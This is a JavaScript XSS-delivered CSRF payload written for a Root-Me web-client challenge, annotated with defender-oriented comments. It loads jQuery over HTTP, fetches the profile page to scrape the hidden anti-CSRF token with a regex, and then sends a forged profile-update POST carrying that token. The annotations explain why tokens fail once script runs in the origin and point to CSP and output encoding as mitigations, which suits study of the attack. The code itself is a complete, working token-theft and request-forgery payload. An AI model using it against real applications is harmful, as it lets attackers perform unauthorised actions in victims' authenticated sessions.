// Load jQuery dynamically into the page this script executes in, by appending a
// <script> element to <head>.
// NOTE(review): the library is fetched over plain HTTP from a third-party host,
// so anything on the network path can alter the script before it runs; the
// "jquery-latest" alias is also a legacy file that the jQuery project no longer
// updates (verify against the CDN before relying on it).
var headx = document.getElementsByTagName('head')[0];
var jq = document.createElement('script');
jq.type = 'text/javascript';
jq.src = 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);
// Issues a jQuery AJAX POST (empty body) to the application's own profile page
// and hands the raw HTML of the response to extractToken(), which pulls the
// anti-CSRF token out of it.
// Because the request is made by the browser from inside the application's
// origin, it is sent with whatever session cookies and Referer the browser
// normally attaches, and the same-origin response body is readable by script.
// That is the defender-relevant point: an anti-CSRF token cannot protect a form
// once script can execute in the origin, so the control that actually matters
// here is preventing the injection (output encoding / a CSP restricting script
// sources), not the token check.
function loadToken(){
  $.ajax({
    type: 'POST',
    url: 'http://challenge01.root-me.org/web-client/ch23/?action=profile',
    contentType: 'application/x-www-form-urlencoded;charset=utf-8',
    dataType: 'text',
    data: '',
    success:extractToken  // response text is passed as the first argument
  });
}
// Success callback for loadToken(): receives the HTML of the profile page as a
// string, searches it for the hidden "token" input and passes the captured
// value to makeCSRF().
// @param {string} response - raw page source returned by the AJAX request
function extractToken(response){
  // Pattern matching the hidden form field that carries the token. The capture
  // group uses a greedy ".*", so everything up to the LAST "' />" on the
  // matched stretch of text is captured, not necessarily just the token.
  var regex = new RegExp("<input type='hidden' name='token' value='(.*)' />",'gi');
  // match() returns the array of matches (or null); that value is discarded on
  // the next line in favour of the legacy RegExp.$1 static, which holds the
  // first capture group of the most recent regex execution. RegExp.$1 is a
  // non-standard property that some engines may drop.
  var token = response.match(regex);
  token = RegExp.$1;
  // Forward the captured token to the function that sends the forged request.
  makeCSRF(token);
}
// Sends the forged profile-update POST using the token captured by
// extractToken(). The request originates from the application's own origin,
// so the server-side token and Referer checks are both satisfied.
// @param {string} token - anti-CSRF token read from the profile page
// Defender notes: the form body below is fixed ("username=lol",
// "status=checked"), i.e. the request is distinguishable server-side only by
// its content, not by its headers; logging state-changing requests together
// with the script context that issued them (CSP violation reports, or a
// Trusted Types / nonce-based CSP that blocks the injected loader) is what
// surfaces this pattern.
function makeCSRF(token){
  $.ajax({
    type: 'POST',
    url: 'http://challenge01.root-me.org/web-client/ch23/?action=profile',
    contentType: 'application/x-www-form-urlencoded;charset=utf-8',
    dataType: 'text',
    // Form-encoded body; the token is appended as-is, without URL encoding.
    data: 'submit=Submit&username=lol&status=checked&token=' + token
  });
}
// Wait a fixed 2 seconds for the dynamically added jQuery <script> to load
// (no load event is used, so a slow fetch means $ is still undefined when
// loadToken runs), then start the token-retrieval request.
// NOTE: passing a string to setTimeout makes the engine evaluate it as code,
// the same mechanism as eval(); a nonce/strict-dynamic CSP without
// 'unsafe-eval' blocks this call outright.
setTimeout('loadToken()', 2000);